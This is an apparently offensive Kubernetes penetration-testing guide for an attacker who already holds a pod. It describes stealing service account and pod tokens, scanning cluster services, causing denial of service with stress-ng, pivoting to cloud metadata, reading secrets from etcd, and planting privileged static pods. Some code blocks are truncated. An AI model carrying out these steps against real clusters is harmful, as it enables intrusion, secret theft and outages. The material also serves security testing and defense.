Usually the pods are run with a **service account token** inside of them. This service account may have some **privileges attached to it** that you could **abuse** to **move** to other pods or even to **escape** to the nodes configured inside the cluster. Check how in:
If the pod is run inside a **cloud environment** you might be able to l**eak a token from the metadata endpoint** and escalate privileges using it.
## Search vulnerable network services
As you are inside the Kubernetes environment, if you cannot escalate privileges abusing the current pods privileges and you cannot escape from the container, you should **search potential vulnerable services.**
### Services
**For this purpose, you can try to get all the services of the kubernetes environment:**
By default, Kubernetes uses a flat networking schema, which means **any pod/service within the cluster can talk to other**. The **namespaces** within the cluster **don't have any network security restrictions by default**. Anyone in the namespace can talk to other namespaces.
The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s\_cheatsheet.md)) will install and scan the IP ranges of the kubernetes cluster:
```bash
sudo apt-get update
sudo apt-get install nmap
nmap-kube ()
{
nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}"
}
nmap-kube-discover () {
local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');
In case the **compromised pod is running some sensitive service** where other pods need to authenticate you might be able to obtain the credentials send from the other pods.
There is no specification of resources in the Kubernetes manifests and **not applied limit** ranges for the containers. As an attacker, we can **consume all the resources where the pod/deployment running** and starve other resources and cause a DoS for the environment.
This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
```
stress-ng --vm 2 --vm-bytes 2G --timeout 30s
```
You can see the difference between while running `stress-ng` and after
```bash
kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
The script [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) will automatically **get the tokens of other pods and check if they have the permission** you are looking for (instead of you looking 1 by 1):
```bash
./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"// Some code
```
### Pivot to Cloud
If the cluster is managed by a cloud service, usually the **Node will have a different access to the metadata** endpoint than the Pod. Therefore, try to **access the metadata endpoint from the node** (or from a pod with hostNetwork to True):
If you can specify the [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) of the Node that will run the container, get a shell inside a control-plane node and get the **etcd database**:
```
kubectl get nodes
NAME STATUS ROLES AGE VERSION
k8s-control-plane Ready master 93d v1.19.1
k8s-worker Ready <none> 93d v1.19.1
```
control-plane nodes have the **role master** and in **cloud managed clusters you won't be able to run anything in them**.
#### Read secrets from etcd
If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets.
Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion.
**Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)**
If you are inside the node host you can make it create a **static pod inside itself**. This is pretty useful because it might allow you to **create a pod in a different namespace** like **kube-system**. This basically means that if you get to the node you could be able to **compromise the whole cluster**. However, nothe that according to the documentation: _The spec of a static Pod cannot refer to other API objects (e.g., ServiceAccount, ConfigMap, Secret, etc)_.
In order to create a static pod you may just need to **save the yaml configuration of the pod in `/etc/kubernetes/manifests`**. The **kubelet service** will automatically talk to the API server to **create the pod**. The API server therefore will be able to see that the pod is running but it cannot manage it. The Pod names will be suffixed with the node hostname with a leading hyphen.
The **path to the folder** where you should write the pods is given by the parameter **`--pod-manifest-path` of the kubelet process**. If it isn't set you might need to set it and restart the process to abuse this technique.
**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from **** [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):